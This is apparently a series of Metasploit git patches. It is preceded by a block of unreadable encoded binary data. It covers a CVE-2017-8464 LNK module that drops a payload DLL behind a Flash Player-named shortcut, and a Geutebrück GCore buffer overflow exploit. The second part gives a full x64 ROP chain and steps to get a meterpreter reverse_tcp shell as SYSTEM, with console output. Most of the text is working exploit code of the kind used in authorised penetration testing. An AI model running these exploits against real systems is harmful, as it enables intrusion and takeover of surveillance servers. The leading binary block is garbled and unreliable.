z#^d6}a>%7d6Jy?Vs(i<_nK9cx=-0I|mi>2z4ubEFzk^Sq@}$5z35~8S+(;p^b;t&TMydy8D5|-0s76OQu88GZBWI|!yisoiQ?I60+ zVV%ROEyORN^5Z^Qj!yWR9`MJGaCW8?pt&nc}4Te33~(GS^&h4>=|}} zUq_x)$MrK2z70Th7HXWmI9)JM*I1RDo6YDWxwf-3R0G|#b1@fM=X;Sx!D{! 
z6biPp(rv3F9ma>U&>fCx#6HDdcn6peK5mSzVUQIAtHhtf1G*Q8hkSI<`0K1~5EAJK zz0wIUE|Od=`*(e zp0LG*q^^_$yK{Sr%{mHFx!kNr+azb26TRU9LpYs`)<9*|S6uHlv7_IaNF;{zZzms< z%iq8Pk95f0($seHIH5X#k~_n3o%`5YqoRet&(KKpx{s|nDcj7k?U%x?bfSiM)QA<; z#EzbH@*~ynPbWLib>55Q%Ki~hqo(bC?uY*C&}fTF*D$gsqh;G__)AX(XGHX|d63pW z@J%9-nw6Uf(MJf3(Wzq?idZh!i!>m=^ml_~$lm$4%70u?CU?tkga>jWhvY21YuoD3 z`efipWibV3fqb`FPfRhIk)eM>#K5ESzDS>x9{y4r$|DMSsaZ$8i!Mp_4o6mhok(B^ zVk%AixF?;Yz{EtjD@TqYgqC$icU(j4V^>06v?wubZ1}Wh?SrwaQw*e6hxNq+NpQAvLAiLCC4A&{v?v7*iM*|q9bRL+Gf=#;$)00hHfbWQi}+*NvqG} zf4i!|`P9v-*#0-k+sPq3EWzowsBr)Fzlh%GPLhyXKLa^E=}pOCp=FE(C0(J+GUqDA zW>ai7=;1T0xTL=j<%ZZum;+iv{7Bn;`F-pl?b+}z;?s-RV1;mXRwfo8mRh9a1rjD* zMjjfA9>jGbE1P%f<-L(Z(nT0TqZ5Zv*_?^+>4&xlQu71;%R1Z6Uh~Bc`F&-+-cw?b zMs{Q26~;eb)(I+XMA7I=aKeUxIyjEx86a6Um}C3l+@1*a5vC{7g&NHQX!K_2M6`TX z4AAZKCQ=-MV{E+>NV!|_WkB7;5#KHhF}5xNGI1n)I^Eb>ifS}^6x@hIaZ(yhWi+y% zuo3Fx_*rHXXmUV8QhCB47n{wfXHq}P4AKB4sYoTA_f+bpkcMz8u0+;pu3au^cL)e2 zau5=tFXtdwdm?n#G7UwVj{DgJ#TBl~ym=&|5JR|#jHCz%ArU|`KA@COOePKiVAYW{ zj{5mHm0r(;&Uf0b`lx~)7kY05)<(e5jdFGO&wTp#+@Bs9HqE#XIL8w zP6lZLqOztf(aSN>Qk_z$le4H7dt86G%kWtz?ca2sE919Mg0L?W(nM^ShD7F*ydBqs zKBqM{4r?p|S>dkiC7ohlJWcM57HO2s2vOk_AB-P3t6#gWlq5(aKkHP_hjcl@qagXGXM+S7tQgeoNsW~%| zr3XUZm&h_u*^|gJQ`yaDgFGlC=`j!DQ7fD;#>CU&pekjYy!VSkTSyBzYq+!*wqO2g z@$NZLB>oQhheuOxPddYvcae^DC?&e+d|gkv4sE^y)s-e^oq(BJj?&G5E~P}jE?>d+T!#4SE%822_cKNS@FI!t2Zl<}cA!CLX%jh5IKy;awyjB@W; zJ65?FA}Jo>|(n($tO`?Juy;4F8?W{l*iS&y;xD2=w$=xEN8J@2Jyj>$Lb zd+5=F#Vpuqw9^gpjXFeZCd|;&cF*;s0ZMVUx+yQ@VSochs)sST(bBKN?|vyc!m+~e z@mHlhGEh67Mi7g_Bnx0Ok?$CwP$H|GbI1UPtZ+IRrU`cmSX)@k{WGz!6Ipa(!Fjvk zJW?R`Q*4{$u;Cj* z8pF534f3)MWrT6(0=@EMU34S8HBegU9zK&1{W(?Sk}hNG<=_-PV=}gGdMd z1$DG!KdlpWqIJ7b*DEDQDFBp`gTo^yE)V77st^5zti-}V0<+87!m;Eu9AZ_GPnQiG~9PL7%9s-xaIvC zVz~2C`N)Ppf?1-)14c*Aa+yn9c9tC6sExl&?DuQ6a*ry&fiBq-|AjJ!;zn~)nX2Q~ zP1P%f=LGU|UxE+@W9p6ejFYW#TF9$nC9= zfYBM)PvyZSx8X2VpFc3IJWmA+L>-Ggfp<-KB54g^h5fbKN`wcU>vRC z)`y{Ba0(q$**FkG*-5WS##jmBD6YqR#I8rS3JL1*)!CLLF-9U7%NyVnI>udu4f0}T 
zAr~IOs7RlDH1ugtI*BJ&^rX|I@LI~~ubOxq#Ge{kA1M{asnj$_XQe}*A@g(9sgECt z{S0fr{|5r{cEVgp1t>?cu!- z+r4NRceQ1r!1Pgl)rjcQjO@tA(zW6#vLBlarPw^}&oRfo!ZwVN&xN}+;m%z5C!u3t zF2eJiJ@SJ?XXR?;-p&POs>H*XV2qo|CBj_8aH$*Os_do_(Q?Q>B~26$B;BM;Gq^j0 zBem1?D7gK5Rr?Rgy|m2Em#0dj^9|BIP1!dBra>9lGmO3rPr-U=Ecgt|*VXaYsN+wh z#t-w)LRH5;DM#!8zf;q$HAy2Q2c+HMe#{LLi(L27P`^m(ohMHsf2jPs5kip;UN@HX z0zDLuV#hH5Azo7c+r&o<^IsG%PiekdNVk*&gCi(#;6M``$kRrOpEuw?9zU0y8$X|c zzfx#ka@!ZZdtwvfgS1|6T_Bzs(x8muQZmqnR?(^QQ}rLAYV!g2PwMDxfg*7F>&9K{ z5yf*eBZ+AF#o5vxWv0QsA1cg50v5c40tY_&1|fV(Wy}LFWQc!C^22d>F;kg=V=6Qf z%426b66w1)rZgFrZ0IJFG5Q_DOt89%LkL?#$?%=EL)Q0-N{l)mUYQ; zRkEz+CCR2gCzy%L{zdX=^T!Qilx{$gvdS&}-yfXcMS#d$zf7SzawJTOu-9ANhjAu93%nspu6^8G4KxMV$1=a;fAReDhcq!g{IUXZx8&&|kf#zn@q$bm<%4SnTqp7yOa%EsjbD&D9ZERpB z(}LQd6soM78wv#1^MQeCQ%z&gG^yIOV!ae-HdRWd${{W!dT2~(uu%e^)Tp(!(kfFG zJ~A>1>n5!uy7>*O8yeR(n3|dcq3T8x|8As`Y>{13;h zsFh63wRZ+mw9|`<@=dwZZ<#;YU;v;C;(JIy9-tUd4p;@a6R-)e6|fs{7%%`Bfdl3; zz;%EbfKos;AP9H}uo>_?U@w5KqbNTBd`@lXs|RENt^oW9a09>rCB@J}2pND4Mn&|XJG`r|E6zWmg7d1j-`cU>~ z99LVlx~LKP1!Etl-P8c(%(&zFFE6Dq;6`~4W3Q$#+!)5b(cOv( zO-Y*_sBa9er%!7uDv+x+HU!qyO6(q1QCZ)-vVu2Qwx*&M&V$j8bY-aTmB}K?>01ClAnPue@?9Qi+qOCfP>1Ka?3N32{#|bRLE*ve>f0veELP zCEYgNHqW-uw!&6t3)v#JhiuG#vE6Kc+Wss1U+iNYc8A}w*se%OqJHB!_ zopYSE&UWX2IbU`D+4+I4!cgf^zO^uSGlit zU+)&&F85UT&F;DG#qQPaBkmJ!UH(P+k^Ig1FXzYdPvzS@0Z-8Lm}iG)kLS;xzj)%F zuRRxgulG*#)_B)>@A2N}eboE3_m|%7-j}_HydQZ7y?^sg@J;spn{TGC)VIu6<*WBa zeE;ry*>~9YiBIGIkzeqa`WN|E`nUVL{crit_*ub-0%Ji|!Hj}i3RV@g7i=&1O~ES# z`wCtw_@4r1Qh%~?sc^Y4K`0hx3X<@Yut#`JI4XQ5d@bn3vEoGWda+2nN&H&8*fPO# zjpcev$P%_ZVtK;SZh6-7zU8DPVHsh~vWnIM>y6f%tr6=Z)+epMv36QtxAs}zwZ^PY z+gw|PEnr)1d&c&f&0^2DPqWXo&$BPKudv^458Cgv-)Dco{uBESJN>?fe@^T|i}G z_kA=L-!890@wUt6E^|NUe%}3}yUYEddsP0V`HuWW`FG{F=KmspfBr}L2G2szBcA6x zhdpz>)!y~qhrGMJ$GsX~j?dzo=Ue5w+qcE{s_z}&M?U7C==b_(`X&G4{{Qs9?*G)U zgMT&L9=!#^nl$|9NS9bdOT9(0{Ms_wnrY32-}0@uSyx({tgY5XHqdR?@Sj&bQ}BGj zo`Sy?unx6t5UvpH!Yu;JNaH^(+rj6lPpBc=gfwy;E3#GE!nUVv2W=nNa_j>9Ji|U0 
zK7QK%q5Ug+x?`+koZ~Gg2ustL7sUx+FL7Ms$alFPhiy*d`n~U)=0D~K6Q*TIsoCW=mu<1_F56Ebd#rsv zq&{l@t^JSoGxn<-Hb;dcjFt2(B)sV8ar}=X!#T-mb$Xmnx!%Ki(YSN?Iw^B6!YaAL zeXsi|_wU?qyFYP{&Y$i9bCZ^pqsa2uJ$pUxcqV(xyi2{edqdtziFS~@Hr|S4>(RZ^iGGf!Wnk%bbjg_=eo`n za`i&{km5s_nh#sUM-*ZmuWun!?sM^AGhqaA8?j>B=7P9mZ9Pfi+{7e z>zL`ff&QCq((#|Sxd5IhMOETPOY|Ce*s3p7Bv6> diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb index 6d2e32a57d..1b316ce6bb 100644 --- a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb @@ -47,8 +47,8 @@ class MetasploitModule < Msf::Exploit::Local ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', - 'WfsDelay' => 45, + 'EXITFUNC' => 'process', + 'WfsDelay' => 30, }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => @@ -78,14 +78,14 @@ class MetasploitModule < Msf::Exploit::Local register_advanced_options( [ OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]), - OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), - OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player']) + OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), + OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) ] ) end def exploit - path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464') + path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464') arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch'] datastore['EXE::Path'] = path datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll") 
@@ -105,8 +105,8 @@ class MetasploitModule < Msf::Exploit::Local def generate_link(path) vprint_status("Generating LNK file to load: #{path}") path << "\x00" - display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name - comment = datastore['LNK_COMMENT'].dup << "\x00" + display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name + comment = datastore['LnkComment'].dup << "\x00" # Control Panel Applet ItemID with our DLL cpl_applet = [ From 4729c885f1d0b848b7bf18973ce49e47715fdcb3 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 5 Oct 2017 11:10:37 -0400 Subject: [PATCH 016/254] Cleanup the CVE-2017-8464 LPE module --- .../windows/local/cve_2017_8464_lnk_lpe.rb | 57 +++++++++++++++---- 1 file changed, 45 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb index 1b316ce6bb..bfc4fc71ba 100644 --- a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb @@ -7,7 +7,9 @@ class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE + include Msf::Exploit::FileDropper include Msf::Post::File + include Msf::Post::Windows::Priv attr_accessor :exploit_dll_name @@ -26,8 +28,8 @@ class MetasploitModule < Msf::Exploit::Local the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. - If no PATH is specified, the module will use drive letters D through Z so the files - may be placed in the root path of a drive such as a shared VM folder or USB drive. + The PATH option must be an absolute path to a writeable directory which is indexed for + searching. If no PATH is specified, the module defaults to %USERPROFILE%. }, 'Author' => [ 
@@ -47,8 +49,9 @@ class MetasploitModule < Msf::Exploit::Local
 ],
 'DefaultOptions' =>
 {
- 'EXITFUNC' => 'process',
- 'WfsDelay' => 30,
+ 'EXITFUNC' => 'process',
+ 'FileDropperDelay' => 15,
+ 'WfsDelay' => 30
 },
 'Arch' => [ARCH_X86, ARCH_X64],
 'Payload' =>
@@ -58,7 +61,6 @@ class MetasploitModule < Msf::Exploit::Local
 'Platform' => 'win',
 'Targets' =>
 [
- [ 'Automatic', { 'Arch' => ARCH_ANY } ],
 [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
 [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
 ],
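Review bot: With the `Automatic` target removed in the second hunk, the `arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']` ternary in `exploit` (visible as context in this commit's last hunk) can no longer take its first branch, because both remaining targets set an explicit `Arch`. Simplifying it to `arch = target['Arch']` would keep the code honest about which targets exist, unless an `ARCH_ANY` target is intended to return later. `exploit` itself lies outside this hunk.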
@@ -84,22 +86,53 @@ class MetasploitModule < Msf::Exploit::Local ) end + def check + if session.sys.process['SearchIndexer.exe'] + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + def get_name(option, default_ext) + name = datastore[option].to_s.strip + name = "#{rand_text_alpha(16)}.#{default_ext}" if name.blank? + name + end + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if session.platform != 'windows' + fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') + end + + if check == Exploit::CheckCode::Safe + fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') + end + + if sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 + fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') + elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 + fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') + end + path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464') arch = target['Arch'] == ARCH_ANY ? 
payload.arch.first : target['Arch'] datastore['EXE::Path'] = path datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll") - path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%") + path = datastore['PATH'] || session.fs.file.expand_path("%USERPROFILE%") path.chomp!("\\") - dll = generate_payload_dll - dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll" - dll_path = write_file("#{path}\\#{dll_name}", dll) + dll_path = "#{path}\\#{get_name('DLLNAME', 'dll')}" + write_file(dll_path, generate_payload_dll) - lnk = generate_link("#{path}\\#{dll_name}") - lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk" - lnk_path = write_file("#{path}\\#{lnk_filename}", lnk) + lnk_path = "#{path}\\#{get_name('FILENAME', 'lnk')}" + write_file(lnk_path, generate_link(dll_path)) + register_files_for_cleanup(dll_path, lnk_path) end def generate_link(path) From e4d99a14b6270f82eca769aa60ad90f62310f9a8 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 5 Oct 2017 11:38:08 -0400 Subject: [PATCH 017/254] Fix EXITFUNC back to process for the RCE too --- modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index 252bb7f97e..a91c80694e 100644 --- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb @@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread' + 'EXITFUNC' => 'process' }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => From 770547269bcbf136ff0d9177d7fbd8e69d7567e4 Mon Sep 17 00:00:00 2001 
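Review bot: `register_files_for_cleanup(dll_path, lnk_path)` is handed a `dll_path` that the preceding `generate_link(dll_path)` call has just mutated, since that method's body (not touched by this commit, shown as context in the earlier `generate_link` hunk) appends a terminator with `path << "\x00"`; the old code passed a freshly interpolated string, so reusing the variable introduces a cleanup path with a trailing NUL. Passing a copy, `write_file(lnk_path, generate_link(dll_path.dup))`, keeps the registered path intact. Separately, the local `path` first names the local data directory and is then reassigned to the remote drop directory; giving the first use its own name such as `data_path` would keep the two roles apart. `exploit` begins on the previous line of this hunk and `generate_link` continues past its end.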
From: Maurice Popp
Date: Fri, 6 Oct 2017 15:39:25 +0200
Subject: [PATCH 018/254] added documentation, and fixed 4 to 2 indentation
---
 .../http/geutebrueck_gcore_x64_rce_bo.md | 63 +++
 .../http/geutebrueck_gcore_x64_rce_bo.rb | 454 +++++++++---------
 2 files changed, 290 insertions(+), 227 deletions(-)
 create mode 100644 documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md
diff --git a/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md
new file mode 100644
index 0000000000..4aff5e18fb
--- /dev/null
+++ b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md
@@ -0,0 +1,63 @@ +## Vulnerable Application + + Geutebrück GCore Server 1.3.8.42,1.4.2.37 are vulnerable to a buffer overflow exploitation. Since this application is started with system privileges this allows a system remote code execution. + +## Verification Steps + + 1. Install Windows as basic OS (Tested with Win2012R2,Windows 7) + 2. Install the Geutebrück GCore server + 3. Verify that http://:13003/statistics/runningmoduleslist.xml available is. + 4. Start msfconsole + 5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]``` + 6. Do: ```set rhost ``` + 7. Do: ```set rport 13003`` + 8. Do: ```set payload windows/x64/meterpreter/reverse_tcp``` + 9. Do: ```exploit``` + 10. You should get a shell as NT/SYSTEM. + +## Scenarios +``` +msf exploit(geutebrueck_gcore_x64_rce_bo) > show options + +Module options (exploit/windows/http/geutebrueck_gcore_x64_rce_bo): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST 192.168.1.10 yes The target address + RPORT 13003 yes The target port + + + + Payload options (windows/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.1.11 yes The listen address + LPORT 4444 yes The listen port + + + Exploit target: + + Id Name + -- ---- + 0 Automatic Targeting + +msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit + [*] Started reverse TCP handler on 192.168.1.11:4444 + [*] 192.168.1.10:13003 - Trying to fingerprint server with http://192.168.1.10:13003/statistics/runningmoduleslist.xml... + [*] 192.168.1.10:13003 - Vulnerable version detected: GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...) + [*] 192.168.1.10:13003 - Preparing ROP chain for target 1.4.2.37! + [*] 192.168.1.10:13003 - Crafting Exploit... + [*] 192.168.1.10:13003 - Exploit ready for sending... + [*] 192.168.1.10:13003 - Exploit sent! 
[*] Sending stage (1188415 bytes) to + [*] Meterpreter session 1 opened ( :4444 -> 49963) at 2017-11-03 13:14:51 +0200 + [*] 192.168.1.10:13003 - Closing socket. + meterpreter > getsystem + ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). + meterpreter > getuid Server username: + NT-AUTORITÄT\SYSTEM + meterpreter > +``` +## Mitigation +Geutebrück released a new Version and an update for the affected version which should be installed to fix the described vulnerabilities. diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb index c3ebbd14b8..4fd1677713 100644 --- a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb 
@@ -7,279 +7,279 @@ require 'nokogiri' require 'open-uri' class MetasploitModule < Msf::Exploit::Remote - include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Tcp - Rank = NormalRanking + Rank = NormalRanking - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', - 'Description' => 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).', - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Luca Cappiello', - 'Maurice Popp' - ], - 'References' => - [ - ['EDB','41153'], - ['URL','www.geutebrueck.com'] - ], - 'Platform' => 'win', - 'Targets' => - [ - ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], - ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], - ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}] - ], - 'Payload' => - { - 'Space' => '2000' - }, - 'Privileged' => true, - 'DisclosureDate' => 'Jan 24 2017', - 'DefaultTarget' => 0)) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', + 'Description' => 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). 
The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).', + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Luca Cappiello', + 'Maurice Popp' + ], + 'References' => + [ + ['EDB','41153'], + ['URL','www.geutebrueck.com'] + ], + 'Platform' => 'win', + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], + ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], + ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}] + ], + 'Payload' => + { + 'Space' => '2000' + }, + 'Privileged' => true, + 'DisclosureDate' => 'Jan 24 2017', + 'DefaultTarget' => 0)) end def fingerprint - print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') - @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) - statistics = @doc.css('modulestate') - statistics.each do |x| - if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') - mytarget = targets[1] - print_status("Vulnerable version detected: #{mytarget.name}") - return Exploit::CheckCode::Appears, mytarget - elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') - mytarget = targets[2] - print_status("Vulnerable version detected: #{mytarget.name}") - return Exploit::CheckCode::Appears, mytarget - end + print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') + @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) + statistics = @doc.css('modulestate') + statistics.each do |x| + if (x.to_s.include? 'GCoreServer') && (x.to_s.include? 
'1.3.8.42') + mytarget = targets[1] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') + mytarget = targets[2] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget end - print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') - print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") - print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') - print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') - [Exploit::CheckCode::Unknown, nil] + end + print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') + print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") + print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') + print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') + [Exploit::CheckCode::Unknown, nil] end def check - fingerprint + fingerprint end def ropchain(target) - if target.name.include? '1.3.8.42' - print_status('Preparing ROP chain for target 1.3.8.42!') + if target.name.include? '1.3.8.42' + print_status('Preparing ROP chain for target 1.3.8.42!') - # 0x140cd00a9 | add rsp, 0x10 ; ret - # This is needed because the next 16 bytes are sometimes messed up. - overwrite = [0x140cd00a9].pack('Q<') + # 0x140cd00a9 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. 
+ overwrite = [0x140cd00a9].pack('Q<') - # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. - stack_align = "\x43" * 16 + # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. + stack_align = "\x43" * 16 - # We have 40 bytes left to align our stack! - # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations - # and to restore it. - # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. - # 0x1404e5cbf: mov edx, esp ; ret - stack_align += [0x1404e5cbf].pack('Q<') + # 0x1404e5cbf: mov edx, esp ; ret + stack_align += [0x1404e5cbf].pack('Q<') - # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. - # We pop -XXXXX as \xxxxxxxxx to rax - # 0x14013db94 pop rax ; ret - stack_align += [0x14013db94].pack('Q<') - stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14013db94 pop rax ; ret + stack_align += [0x14013db94].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') - # Our value is enough. - # 0x1407dc547 | add rax,rdx ; ret - stack_align += [0x1407dc547].pack('Q<') + # Our value is enough. + # 0x1407dc547 | add rax,rdx ; ret + stack_align += [0x1407dc547].pack('Q<') - # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. - # 0x140ce9ac0 | mov rsp, rax ; ..... 
; ret - stack_align += [0x140ce9ac0].pack('Q<') + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret + stack_align += [0x140ce9ac0].pack('Q<') - # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. - # We want RCX to hold the value for VP Argument "Address of Shellcode" - # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; - rop = '' - rop += [0x140cc2234].pack('Q<') - rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; - # 0x1400ae2ae | POP RDX; RETN - # 0x...1000 | Value for VP "Size of Memory" - rop += [0x1400ae2ae].pack('Q<') - rop += [0x0000000000000400].pack('Q<') + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140cc2234].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x1400ae2ae | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x1400ae2ae].pack('Q<') + rop += [0x0000000000000400].pack('Q<') - # 0x14029dc6e: | POP R8; RET - # 0x...40 | Value for VP "Execute Permissions" - rop += [0x14029dc6e].pack('Q<') - rop += [0x0000000000000040].pack('Q<') + # 0x14029dc6e: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x14029dc6e].pack('Q<') + rop += [0x0000000000000040].pack('Q<') - # 0x1400aa030 | POP R9; RET - # 0x1409AE1A8 is the .data section of gcore - rop += [0x1400aa030].pack('Q<') - rop += [0x1409AE1A8].pack('Q<') + # 0x1400aa030 | POP R9; RET + # 0x1409AE1A8 is the .data section of gcore + rop += [0x1400aa030].pack('Q<') + rop += [0x1409AE1A8].pack('Q<') - # 0x140b5927a: xor rax, rax ; ret - rop += 
[0x140b5927a].pack('Q<') + # 0x140b5927a: xor rax, rax ; ret + rop += [0x140b5927a].pack('Q<') - # 0x1402ce220 pop rax ; ret - # 0x140d752b8 | VP Stub IAT Entry - rop += [0x1402ce220].pack('Q<') - rop += [0x140d752b8].pack('Q<') + # 0x1402ce220 pop rax ; ret + # 0x140d752b8 | VP Stub IAT Entry + rop += [0x1402ce220].pack('Q<') + rop += [0x140d752b8].pack('Q<') - # 0x1407c6b3b mov rax, qword [rax] ; ret ; - rop += [0x1407c6b3b].pack('Q<') + # 0x1407c6b3b mov rax, qword [rax] ; ret ; + rop += [0x1407c6b3b].pack('Q<') - # 0x140989c41 push rax; ret - rop += [0x140989c41].pack('Q<') + # 0x140989c41 push rax; ret + rop += [0x140989c41].pack('Q<') - # 0x1406d684d jmp rsp - rop += [0x1406d684d].pack('Q<') + # 0x1406d684d jmp rsp + rop += [0x1406d684d].pack('Q<') - [rop, overwrite, stack_align] + [rop, overwrite, stack_align] - elsif target.name.include? 